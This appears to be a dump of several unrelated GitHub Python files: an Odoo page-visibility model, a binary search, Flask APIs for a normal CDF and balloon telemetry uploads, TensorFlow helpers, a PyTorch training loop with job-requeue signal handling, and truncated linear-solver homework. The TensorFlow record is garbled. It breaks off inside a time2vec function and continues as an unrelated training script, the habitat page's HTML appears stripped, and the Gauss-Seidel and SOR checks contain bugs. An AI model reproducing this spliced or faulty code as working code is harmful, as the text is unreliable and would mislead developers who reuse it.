+{"seq_id":"35315096509","text":"from odoo.http import request\nfrom odoo import fields, models, SUPERUSER_ID\n\n\nclass Page(models.Model):\n _inherit = \"website.page\"\n\n group_ids = fields.Many2many(\n \"res.groups\",\n string=\"Visible Groups\",\n help=(\n \"The user needs to be in at least one of these groups for the redirect to\"\n + \" have effect\"\n ),\n )\n\n def _compute_visible(self):\n super()._compute_visible()\n if self.env.user.id != SUPERUSER_ID:\n for record in self:\n if record.group_ids and record.is_visible:\n record.is_visible = any(\n gid in request.env.user.groups_id.ids\n for gid in record.group_ids.ids\n )\n","repo_name":"ayudoo/odoo_business_relationships","sub_path":"website_user_types/models/website_page.py","file_name":"website_page.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7454050967","text":"# 二分查找练习,递归实现\n# 当前查找范围的首元素和尾元素下标值(left,right)\ndef binarysearch(value,key,left,right):\n # 递归的退出条件\n if left > right:\n # 查找结束,为找到\n return -1\n # 获取中间元素对应下标值\n middle = (left + right) // 2\n # 对比中间元素与查找元素\n if value[middle] == key:\n # 查找成功\n return middle\n elif value[middle] > key:\n # 若中间元素大于待查找元素值则在左侧继续查找\n # 查找范围减半:左侧下标值不变,右侧下标值变为middle-1 \n return binarysearch(value,key,left,middle-1)\n else: \n # 若中间元素小于待查找元素值,则在右侧继续查找\n # 查找范围减半:右侧下标值不变,左侧下标值变为middle+1\n return binarysearch(value,key,middle+1,right)\nif __name__ == \"__main__\":\n # 原始数据\n value = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n # 待查找数据\n key = 6\n res = binarysearch(value,key,0,len(value)-1)\n if res == -1:\n print(\"查找失败\")\n print(\"查找成功,是第%d张\"%(res+1))","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Feb_all/sort_and_calculate/poker_half_find.py","file_name":"poker_half_find.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20839125180","text":"from os import abort\nimport flask\nfrom flask import request, jsonify\nfrom scipy.stats import norm\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['GET'])\ndef home():\n # define distribution parameters\n if 'mu' in request.args:\n mu = float(request.args['mu'])\n x = int(request.args['x'])\n sigma = float(request.args['sigma'])\n # create distribution\n dist = norm(mu, sigma)\n result = dist.cdf(x)\n print((result))\n return str(round(result,2))\n else:\n return \"Nothing Found\"\n\napp.run()","repo_name":"abdulrehman25/cdf-calculator-flask-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7034115003","text":"from abc import ABC\nfrom tensorflow.keras import Sequential, layers, Model, losses\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nfrom icecream import ic\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import Optional, Tuple, List\nfrom tensorflow.python.keras.layers import Lambda\n\n\ndef tf_dataset_itr(tf_ds: tf.data.Dataset):\n for x_batch, y_batch in tf_ds:\n for x, y in zip(x_batch, y_batch):\n yield x, y\n\n\ndef rounded_accuracy(y_true, y_pred):\n \"\"\"\n Get the offset mean absolute error of rounded true and prediction values from 100%.\n value 1.0 -> Zero mean absolute error\n :param y_true: true/Ground values\n :param y_pred: prediction values\n :return: rounded mean absolute error metric\n \"\"\"\n return 1 - tf.keras.metrics.mean_absolute_error(tf.round(y_true), tf.round(y_pred))\n\n\ndef plot_confusion_matrix(model: tf.keras.Model,\n dataset: tf.data.Dataset,\n prediction_function: callable = np.argmax):\n ds = dataset.unbatch()\n y_true = np.array([y for _, y in ds.unbatch().as_numpy_iterator()])\n y_pred = [model.predict(x) for x, _ in ds.unbatch().as_numpy_iterator()]\n y_pred = np.array(map(prediction_function, y_pred))\n cm = tf.math.confusion_matrix(y_true, y_pred)\n cm = pd.DataFrame(np.array(cm))\n sns.heatmap(cm, annot=True)\n\n\ndef get_x_shape(tf_ds):\n return np.squeeze(next(tf_dataset_itr(tf_ds))[0]).shape\n\n\ndef ds_x_data(tf_ds):\n return np.array([x for x, _ in tf_ds.as_numpy_iterator()])\n\n\ndef ds_y_data(tf_ds):\n return np.array([y for _, y in tf_ds.as_numpy_iterator()])\n\n\ndef get_random_sample(tf_ds: tf.data.Dataset,\n sample_size: int = 1):\n \"\"\"\n Get a random sample from tf.data.Dataset\n :param tf_ds: tf.data.Dataset object\n :param sample_size: sample size\n :return: random sample of x_data and y_data as numpy.array()\n \"\"\"\n ds = tf_ds.shuffle(1024)\n x_data = np.array([x for x, _ in ds.take(sample_size)])\n y_data = np.array([y for _, y in ds.take(sample_size)])\n return x_data, y_data\n\n\ndef train_test_dataset_spilt(tf_ds: tf.data.Dataset,\n split: float = 0.2,\n batch_size: int = 32,\n dataset_length: int = None) \\\n -> Tuple[tf.data.Dataset, tf.data.Dataset]:\n \"\"\"\n Splits an Exsiting tf.Data.Dataset into Train and Test tf.data.Datasets\n :param tf_ds: The tf.Data.Dataset object\n :param split: test data fraction (0.0 < split < 1.0)\n :param batch_size: Batch size\n :param dataset_length: Defaults to len(tf_ds), otherwise can specify here.\n :return:\n \"\"\"\n assert 0.0 < split < 1.0\n assert batch_size > 0\n ds = tf_ds.shuffle(1024).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n n = len(ds) if dataset_length is None else dataset_length\n test_ds = ds.take(int(split * n)).shuffle(1024, reshuffle_each_iteration=True).prefetch(\n tf.data.experimental.AUTOTUNE)\n train_ds = ds.skip(int(split * n)).take(int((1 - split) * n)).shuffle(1024, reshuffle_each_iteration=True).prefetch(\n tf.data.experimental.AUTOTUNE)\n return train_ds, test_ds\n\n\ndef relative_tensor(tensor: tf.float64, row: int):\n return tf.concat([tensor[:row], tensor[row + 1:]], axis=0)\n\n\ndef relative_variance(tensor: tf.float64, axis: int = 0):\n if axis > 2:\n raise ValueError('axis must be 0->rows or 1->columns.')\n elif axis == 1:\n t = tf.transpose(tensor)\n else:\n t = tensor\n trr_rows = []\n for row in range(tensor.shape[0]):\n trr_row = relative_tensor(t, row)\n trr_row = tf.math.reduce_variance(trr_row, axis=1)\n trr_row = tf.expand_dims(trr_row, axis=1)\n trr_rows.append(trr_row)\n trr = tf.concat(trr_rows, axis=1)\n trr = tf.squeeze(trr)\n return tf.transpose(trr) if axis == 1 else trr\n\n\ndef tensor_minmax_scaler(tensor):\n min_val = tf.math.reduce_min(tensor)\n max_val = tf.math.reduce_max(tensor)\n return (tensor - min_val) / max_val\n\n\ndef tensor_standard_scaler(tensor):\n mu = tf.math.reduce_mean(tensor)\n std = tf.math.reduce_std(tensor)\n return (tensor - mu) / std\n\n\ndef variance_outlier_extraction(tensor):\n tensor = tensor_minmax_scaler(tensor)\n t_row = relative_variance(tensor)\n t_col = relative_variance(tensor, axis=1)\n trc = tf.math.reduce_min(tf.concat([\n tf.expand_dims(t_row, axis=2),\n tf.expand_dims(t_col, axis=2),\n ],\n axis=2),\n axis=2)\n trc = tf.expand_dims(trc, axis=2)\n trc = tf.image.flip_up_down(trc)\n return tensor_minmax_scaler(tensor)\n\n\ndef variance_outlier_extraction_layer():\n return tf.keras.layers.Lambda(variance_outlier_extraction)\n\n\ndef time2vec(input_dim: int, output_dim: int, name: str = 'Time2Vec', **kwargs):\n \"\"\"\n Time2Vec Encoding outputting Vector Representation of Time\n Citation:\n URL https://arxiv.org/abs/1907.05321\n @misc{https://doi.org/10.48550/arxiv.1907.05321,\n doi = {10.48550/ARXIV.1907.05321},\n url = {https://arxiv.org/abs/1907.05321},\n author = {Kazemi, Seyed Mehran and Goel, Rishab and Eghbali, Sepehr and Ramanan, Janahan and Sahota,\n Jaspreet and Thakur, Sanjay and Wu, Stella and Smyth, Cathal and Poupart, Pascal and Brubaker, Marcus},\n keywords = {Machine Learning (cs.LG), FOS: Computer and information sciences, FOS: Computer and information sciences},\n title = {Time2Vec: Learning a Vector Representation of Time},\n publisher = {arXiv},\n year = {2019},\n copyright = {Creative Commons Attribution Non-Commercial Share Alike 4.0 International}\n }\n :param input_dim: Size of the input (batch, input_dim)\n :param output_dim: Size of the output (batch, output_dim)\n :param name: Keras Layer name\n :param kwargs: tf.keras.Model() keywords\n :return: (batch, output_dim) Vector Representation of Time\n \"\"\"\n # tou (batch, signal)\n # y0 = w0 . t + phi0 ; k=0\n tou = tf.keras.layers.Input((input_dim,))\n y0 = tf.keras.layers.Dense(1, activation=None)(tou)\n # y = sin( W . t + Phi ); 0 implement whatever makes sense in your environment below.'''\n # ==========================================================================\n\n if os.path.isfile(os.path.join(RESUME_PATH, CHECKPOINT_filename)):\n logger.info('time is up, back to queue')\n SCRIPT_PATH = sys.argv[0]\n # USERTODO : Implement command to launch a new job resuming this one\n # command =\n # ==========================================================================\n\n logger.info('Executing %s' % command)\n if os.system(command):\n raise RuntimeError('launch failed')\n time.sleep(3)\n logger.info('New job submitted to the queue, saving checkpoint')\n return\n\n''' Install signal handler\n'''\nsignal.signal(signal.SIGUSR1, signalHandler)\n\nfeat_ind = {\n 'fpn_res5_2_sum': 0,\n 'fpn_res4_5_sum': 1,\n 'fpn_res3_3_sum': 2,\n 'fpn_res2_2_sum': 3\n}\n\n#-------------------------------------------------------------------------------\n# Elementary functions\ndef prepareMultiscaleForForwardOnGpu(*tensors, **kwargs):\n assert 'nb_scales' in kwargs.keys()\n if 'gpu_id' not in kwargs.keys():\n kwargs['gpu_id'] = 0\n rslt = []\n def prepareTensor(tensor, gpu_id):\n return Variable(tensor.cuda(gpu_id), requires_grad = False)\n for ind, tens in enumerate(tensors):\n rslt.append({})\n assert isinstance(tens, dict), \\\n 'No other cases considered for multiscale for now.'\n\n for k, v in tens.items():\n rslt[ind][k] = []\n for sc in range(kwargs['nb_scales'][feat_ind[k]]):\n rslt[ind][k].append(prepareTensor(v[sc], gpu_id = kwargs['gpu_id']))\n return rslt\n\n\ndef resetTrainStatsSingleFrameMultiscale(opt):\n rstats = {}\n levelNames = ['fpn_res5_2_sum', 'fpn_res4_5_sum', 'fpn_res3_3_sum', 'fpn_res2_2_sum']\n for l in range(opt['FfpnLevels']):\n lev = levelNames[l]\n for loss_type in opt['loss_features']:\n for sc in range(opt['nb_scales'][l]):\n rstats['train_%s-%s-%s' % (lev, loss_type, sc)] = []\n\n return rstats\n\n\ndef resetValStatsSingleFrameMultiscale(opt):\n rstats = {}\n levelNames = ['fpn_res5_2_sum', 'fpn_res4_5_sum', 'fpn_res3_3_sum', 'fpn_res2_2_sum']\n for l in range(opt['FfpnLevels']):\n lev = levelNames[l]\n for loss_type in opt['loss_features']:\n for sc in range(opt['nb_scales'][l]):\n rstats['val_%s-%s-%s' % (lev, loss_type, sc)] = []\n\n return rstats\n\n\ndef resetTrainProgressMultiscale(opt, train_loader, stats):\n runningTrainLoss = 0.0\n train_loader.reset(reshuffle = True)\n # Stats\n for t in range(opt['n_target_frames']):\n stats['t+%d' % (t+1)] = {}\n stats['t+%d' % (t+1)].update(resetTrainStatsSingleFrameMultiscale(opt))\n stats['train_ae_loss_values'] = []\n return runningTrainLoss\n\n\ndef resetValProgressMultiscale(opt, val_loader, stats):\n totalValLoss = 0.0\n ctValIt = 0\n val_loader.reset()\n # Stats\n for t in range(opt['n_target_frames']):\n if not stats.has_key('t+%d' % (t+1)): stats['t+%d' % (t+1)] = {}\n stats['t+%d' % (t+1)].update(resetValStatsSingleFrameMultiscale(opt))\n stats['val_ae_loss_values'] = []\n return totalValLoss, ctValIt\n\ndef reshapeMultiscaleTargetsForCriterion(targets, nT, nb_feat, nb_scales):\n seq_targets = []\n for t in range(nT):\n rtargets = {}\n for k, v in targets.items():\n rtargets[k] = []\n for sc in range(nb_scales[feat_ind[k]]):\n assert v[sc].dim() == 4\n assert v[sc].size(1) == nT * nb_feat\n st, en = t * nb_feat, (t+1) * nb_feat\n rtargets[k].append(v[sc][:, st:en, :, :])\n seq_targets.append(rtargets)\n return seq_targets\n\ndef updateTrainProgress(opt, runningTrainLoss, lossdata, loss_terms, stats, i, rtl_period, epoch):\n stats['train_ae_loss_values'].append(lossdata)\n for kt, vt in enumerate(loss_terms):\n for ks, vs in vt.items() :\n stats['t+%d' % (kt+1)]['train_'+ks].append(vs)\n runningTrainLoss += lossdata\n if i % rtl_period == (rtl_period -1):\n avgRunningTrainLoss = runningTrainLoss / rtl_period\n logger.info('[%d, %5d] running train loss: %.3f' %\n (epoch + 1, i + 1, avgRunningTrainLoss))\n runningTrainLoss = 0.0\n\n return runningTrainLoss\n\ndef updateValProgress(totalValLoss, ctValIt, lossdata, loss_terms, stats, epoch, i, rtl_period):\n stats['val_ae_loss_values'].append(lossdata)\n for kt, vt in enumerate(loss_terms):\n for ks, vs in vt.items() :\n stats['t+%d' % (kt+1)]['val_'+ks].append(vs)\n totalValLoss += lossdata\n ctValIt += 1\n if i % rtl_period == (rtl_period -1):\n avgValLoss = totalValLoss / ctValIt\n logger.info('[%d, %5d] mean validation loss: %.3f' %\n (epoch + 1, i + 1, avgValLoss))\n return totalValLoss, ctValIt\n\n\ndef checkIsBest(totalValLoss, ctValIt, bestModelPerf=None):\n current_val = - totalValLoss/ctValIt\n sigma = 0.001\n logger.info('Current val : %.3f' % current_val)\n if bestModelPerf is None:\n bestModelPerf = current_val\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return False, bestModelPerf\n else:\n if current_val > bestModelPerf + sigma:\n bestModelPerf = current_val\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return True, bestModelPerf\n else:\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return False, bestModelPerf\n\n\ndef format_variable_length_multiscale_sequence(outputs, ffpn_levels, nT, nb_scales):\n \"\"\" Only implemented in case single feature training...\"\"\"\n find_feature_by_dim = {\n 32 : 'fpn_res5_2_sum', 64 : 'fpn_res4_5_sum',\n 128 : 'fpn_res3_3_sum', 256 : 'fpn_res2_2_sum'}\n seq_outputs = []\n assert len(outputs) == nT * ffpn_levels\n current_frame = 0\n feat = None\n for f, out in enumerate(outputs):\n if len(seq_outputs) == current_frame: seq_outputs.append({})\n if feat is None: feat = find_feature_by_dim[out[-1].size(2)]\n assert len(out) == nb_scales[feat_ind[feat]]\n assert find_feature_by_dim[out[-1].size(2)] == feat\n seq_outputs[current_frame][feat] = out\n current_frame +=1\n if (f+1)%nT == 0:\n current_frame = 0\n feat = None\n return seq_outputs\n\n#-------------------------------------------------------------------------------\n# Main functions\ndef train_multiscale(opt, model, train_loader, criterion, optimizer, epoch, stats, best_prec1, start_iter = 0):\n global SIGNAL_RECEIVED\n from detectron.utils.timer import Timer\n t = Timer()\n model.train()\n\n runningTrainLoss = resetTrainProgressMultiscale(opt, train_loader, stats)\n rtl_period = max(5, int(len(train_loader)/1))\n logger.info('-------------------------- Training epoch #%d --------------------------' % (epoch+1))\n t.tic()\n # set the variables for signal_handler\n global RESUME_PATH, NUM_GPUS\n RESUME_PATH = opt['save']\n NUM_GPUS = opt['gpu_id'] + 1 # relies assumption that the model uses the last GPU\n\n for i, data in enumerate(train_loader):\n # Skip the iterations included in the checkpoint\n if i < start_iter: continue\n\n # Get and prepare data\n inputs, targets, _ = data\n inputs, targets = prepareMultiscaleForForwardOnGpu(inputs, targets, **{'gpu_id' : opt['gpu_id'], 'nb_scales': opt['nb_scales']})\n targets = reshapeMultiscaleTargetsForCriterion(targets, opt['n_target_frames'], opt['nb_features'], opt['nb_scales'])\n # Optimization\n optimizer.zero_grad()\n ffpnlevels = 1 if opt['train_single_level'] else opt['FfpnLevels']\n outputs = format_variable_length_multiscale_sequence(model(inputs), ffpnlevels, opt['n_target_frames'], opt['nb_scales'])\n loss, loss_terms = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n # Update progress\n runningTrainLoss = updateTrainProgress(opt, runningTrainLoss, loss.item(), loss_terms, stats, i, rtl_period, epoch)\n\n if SIGNAL_RECEIVED:\n save_checkpoint({\n 'epoch': epoch,\n 'iter': i+1,\n 'opt_path': os.path.join(opt['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n }, False, savedir = opt['save'])\n logger.info('Saved checkpoint before exiting peacefully for job requeuing')\n exit(0)\n del loss, inputs, outputs, targets, loss_terms\n t.toc() ; t.tic()\n if i >= (opt['it']-1) : break\n print('Training iteration average duration : %f' % t.average_time)\n\n\ndef val_multiscale(opt, model, val_loader, criterion, epoch, stats, bestModelPerf, optimizer):\n global SIGNAL_RECEIVED\n from detectron.utils.timer import Timer\n t = Timer()\n model.eval()\n totalValLoss, ctValIt = resetValProgressMultiscale(opt, val_loader, stats)\n rtl_period = max(5, int(len(val_loader)/1))\n t.tic()\n coco_cityscapes_dataset = val_loader.data_source.dataset.dataset.dataset\n json_classes = coco_cityscapes_dataset.classes\n with torch.no_grad():\n for i, data in enumerate(val_loader):\n # Get and prepare data\n inputs, targets, seqIDs = data\n inputs, targets = prepareMultiscaleForForwardOnGpu(inputs, targets, **{'gpu_id' : opt['gpu_id'], 'nb_scales': opt['nb_scales']})\n targets = reshapeMultiscaleTargetsForCriterion(targets, opt['n_target_frames'], opt['nb_features'], opt['nb_scales'])\n # Evaluation\n ffpnlevels = 1 if opt['train_single_level'] else opt['FfpnLevels']\n outputs = format_variable_length_multiscale_sequence(model(inputs), ffpnlevels, opt['n_target_frames'], opt['nb_scales'])\n loss, loss_terms = criterion(outputs, targets)\n # Update progress\n totalValLoss, ctValIt = updateValProgress(totalValLoss, ctValIt, loss.item(), loss_terms, stats, epoch, i, rtl_period)\n t.toc() ; t.tic()\n if SIGNAL_RECEIVED:\n save_checkpoint({\n 'epoch': epoch + 1,\n 'iter': 0,\n 'opt_path': os.path.join(opt['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': bestModelPerf,\n 'optimizer' : optimizer.state_dict(),\n }, False, savedir = opt['save'])\n logger.info('Saved checkpoint before exiting peacefully for job requeuing')\n exit(0)\n del loss, inputs, outputs, targets, loss_terms\n if i >= (opt['it']-1) : break\n logger.info('Validation iteration average duration : %f' % t.average_time)\n\n return checkIsBest(totalValLoss, ctValIt, bestModelPerf=bestModelPerf)\n\n\ndef save(model, optimizer, epoch, entireSetOptions, stats, isBestModel, bestModelPerf):\n nEs = entireSetOptions['nEpocheSave']\n logger.info('Saving results to %s' % entireSetOptions['save'])\n logger.info('Saving model to '+entireSetOptions['save'] + 'model_%dep.net' % (epoch+1))\n torch.save(model.state_dict(), entireSetOptions['save'] + 'model_%dep.net' % (epoch+1))\n save_checkpoint({\n 'epoch': epoch + 1,\n 'iter': 0,\n 'opt_path': os.path.join(entireSetOptions['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': bestModelPerf,\n 'optimizer' : optimizer.state_dict(),\n },\n isBestModel,\n savedir = entireSetOptions['save'])\n train_mean_ae_loss = np.mean(stats['train_ae_loss_values'])\n val_mean_ae_loss = np.mean(stats['val_ae_loss_values'])\n logger.info('Mean autoencoder loss throughout training epoch: %.5f' % train_mean_ae_loss)\n logger.info('Mean autoencoder loss of validation epoch: %.5f' % val_mean_ae_loss)\n\n logs = dict([('n_epoch', epoch+1)])\n for k, v in stats.items() :\n if isinstance(v, dict):\n for kv, vv in v.items():\n logs['_'.join((k, kv))] = np.mean(vv)\n else:\n logs[k] = np.mean(v)\n\n logger.info(\"__log__:%s\" % json.dumps(logs))\n","repo_name":"facebookresearch/instpred","sub_path":"autoregressive_training.py","file_name":"autoregressive_training.py","file_ext":"py","file_size_in_byte":13383,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"69"}
+{"seq_id":"9483104451","text":"import flask\nimport base64\nimport json\nimport time\nimport couchdbkit\nfrom werkzeug.contrib.cache import SimpleCache as Cache\nfrom xml.sax.saxutils import escape as htmlescape\nfrom habitat import uploader\nfrom . import couch_to_xml\nfrom habitat.utils.startup import load_config, setup_logging\n\n# Monkey patch float precision\njson.encoder.FLOAT_REPR = lambda o: format(o, '.5f')\n\napp = flask.Flask(\"habitat_transition.app\")\ncache = Cache(threshold=10, default_timeout=60)\n\n# Load config here :S ?\n# N.B.: Searches working directory since it won't be specified in argv.\n# Configure uwsgi appropriately.\nconfig = load_config()\nsetup_logging(config, \"transition_app\")\ncouch_settings = {\"couch_uri\": config[\"couch_uri\"],\n \"couch_db\": config[\"couch_db\"]}\n\n@app.route(\"/\")\ndef hello():\n return \"\"\"\n \n \n\n payloads list \n XML
\n\n receivers list \n JSON
\n\n \n\n \n\n \n\n \n \n \"\"\"\n\ndef get_time_created():\n if \"time_created\" not in flask.request.form:\n return None\n\n time_created = flask.request.form[\"time_created\"]\n if not time_created:\n return None\n\n return int(time_created)\n\n@app.route(\"/payload_telemetry\", methods=[\"POST\"])\ndef payload_telemetry():\n callsign = flask.request.form[\"callsign\"]\n string = flask.request.form[\"string\"]\n string_type = flask.request.form[\"string_type\"]\n metadata = json.loads(flask.request.form[\"metadata\"])\n time_created = get_time_created()\n\n if string_type == \"base64\":\n string = base64.b64decode(string)\n elif string_type == \"ascii\" or string_type == \"ascii-stripped\":\n string = string.encode(\"utf8\")\n\n if string_type == \"ascii-stripped\":\n string += \"\\n\"\n\n assert callsign and string\n assert isinstance(metadata, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n try:\n u.payload_telemetry(string, metadata, time_created)\n except uploader.UnmergeableError:\n app.logger.warning(\"Unmergeable: %s (%r)\", callsign, string)\n\n return \"OK\"\n\n@app.route(\"/listener_information\", methods=[\"POST\"])\ndef listener_information():\n callsign = flask.request.form[\"callsign\"]\n data = json.loads(flask.request.form[\"data\"])\n time_created = get_time_created()\n\n assert callsign and data\n assert isinstance(data, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n u.listener_information(data, time_created)\n\n return \"OK\"\n\n@app.route(\"/listener_telemetry\", methods=[\"POST\"])\ndef listener_telemetry():\n callsign = flask.request.form[\"callsign\"]\n data = json.loads(flask.request.form[\"data\"])\n time_created = get_time_created()\n\n assert callsign and data\n assert isinstance(data, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n u.listener_telemetry(data, time_created)\n\n return \"OK\"\n\n@app.route(\"/allpayloads\")\ndef allpayloads():\n text = cache.get('allpayloads')\n if text is None:\n text = couch_to_xml.dump_xml(**couch_settings)\n cache.set('allpayloads', text)\n response = flask.make_response(text)\n set_expires(response, 60)\n return response\n\ndef set_expires(response, diff):\n expires = time.time() + diff\n expires = time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\",\n time.gmtime(expires))\n\n response.headers[\"Expires\"] = expires\n\nHTML_DESCRIPTION = u\"\"\"\n \nRadio: {radio_safe} \nAntenna: {antenna_safe} \nLast Contact: {tdiff_hours} hours ago \n \n\"\"\"\n\ndef listener_map(callsign, data):\n try:\n info = data[\"information\"][\"data\"]\n telemetry = data[\"telemetry\"][\"data\"]\n\n tdiff = int(time.time()) - data[\"latest\"]\n tdiff_hours = tdiff / 3600\n\n for key in [\"radio\", \"antenna\"]:\n if key not in info:\n info[key] = \"Unknown\"\n\n if \"altitude\" not in telemetry:\n telemetry[\"altitude\"] = 0.0\n\n info[\"radio_safe\"] = htmlescape(info[\"radio\"])\n info[\"antenna_safe\"] = htmlescape(info[\"antenna\"])\n info[\"tdiff_hours\"] = tdiff_hours\n\n return {\n \"name\": callsign,\n \"lat\": telemetry[\"latitude\"],\n \"lon\": telemetry[\"longitude\"],\n \"alt\": telemetry[\"altitude\"],\n \"tdiff_hours\": tdiff_hours,\n \"description\": HTML_DESCRIPTION.format(**info)\n }\n except KeyError:\n return None\n\ndef receivers_load(couch_db):\n listeners = {}\n\n yesterday = int(time.time() - (24 * 60 * 60))\n startkey = [yesterday, None]\n o = {\"startkey\": startkey}\n\n for doc_type in [\"information\", \"telemetry\"]:\n view_name = \"listener_{0}/time_created_callsign\".format(doc_type)\n view = couch_db.view(view_name, **o)\n\n for result in view:\n (time_uploaded, callsign) = result[\"key\"]\n\n l = {doc_type: result[\"id\"], \"latest\": time_uploaded}\n\n if callsign not in listeners:\n listeners[callsign] = l\n else:\n listeners[callsign].update(l)\n\n required_ids = {}\n remove_listeners = []\n for callsign in listeners:\n l = listeners[callsign]\n\n if not callsign or \"chase\" in callsign \\\n or \"information\" not in l or \"telemetry\" not in l:\n remove_listeners.append(callsign)\n else:\n required_ids[listeners[callsign][\"information\"]] = callsign\n required_ids[listeners[callsign][\"telemetry\"]] = callsign\n\n for callsign in remove_listeners:\n del listeners[callsign]\n\n docs = couch_db.all_docs(keys=required_ids.keys(), include_docs=True)\n\n for result in docs:\n doc_id = result[\"id\"]\n doc = result[\"doc\"]\n\n callsign = required_ids[doc_id]\n if doc[\"type\"] == \"listener_information\":\n listeners[callsign][\"information\"] = doc\n elif doc[\"type\"] == \"listener_telemetry\":\n listeners[callsign][\"telemetry\"] = doc\n else:\n raise KeyError(\"type\")\n\n return listeners\n\n@app.route(\"/receivers\")\ndef receivers():\n couch_server = couchdbkit.Server(couch_settings[\"couch_uri\"])\n couch_db = couch_server[couch_settings[\"couch_db\"]]\n\n listeners = receivers_load(couch_db)\n\n response_data = []\n for callsign in listeners:\n l = listener_map(callsign, listeners[callsign])\n if l is not None:\n response_data.append(l)\n\n response = flask.make_response(json.dumps(response_data))\n set_expires(response, 10 * 60)\n response.headers[\"Content-type\"] = \"application/json\"\n return response\n","repo_name":"ukhas/habitat-transition","sub_path":"habitat_transition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"7746300639","text":"#####################################################################################################\r\n# Milos Atz\r\n# NE155 Homework 5\r\n#####################################################################################################\r\nimport math\r\nimport numpy as np\r\nimport scipy\r\n#####################################################################################################\r\n# Problem 4\r\n# Write a program to implement the following iterative methods for a matrix with n unknowns.\r\n# (a) Jacobi method\r\n# (b) Gauss Seidel method\r\n# (c) SOR method\r\n#####################################################################################################\r\n# First, build the system using the method performed in Problem 1\r\ndef matrix_build(n):\r\n\ta=[-1]*int(n-1)\r\n\tb=[4]*int(n)\r\n\tc=[-1]*int(n-1)\r\n\tA=np.matrix(np.diag(a, -1) + np.diag(b, 0) + np.diag(c, 1))\r\n\treturn(A)\r\ndef b_build(n):\r\n\tb=np.zeros(n)\r\n\tfor i in range(0, n):\r\n\t\tb[i]=100\r\n\tb=np.transpose(np.matrix(b))\r\n\treturn(b)\r\n#####################################################################################################\r\n# a) Jacobi method\r\n# Strategy: use a while loop to iterate while some convergence equation between x_old and x_new is greater than the input tolerance. The initial values for x are defined as x_old. In every while loop, x_new is calculated based on x_old. The error is then calculated. If the error tolerance is met, the while loop ends; if not, x_old = x_new and the loop repeats. I should implement an iteration counter to count the number of loops.\r\ndef jacobi_solver(A, b, tol=1e-6):\r\n\tn=b.size\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tD_inv=np.linalg.inv(D)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=D_inv*(D-A)*x_old+D_inv*b\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# b) Gauss-Seidel Method\r\ndef gs_solver(A, b, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(-U*x_old+b)\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# c) SOR Method\r\ndef sor_solver(A, b, w=1.1, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not 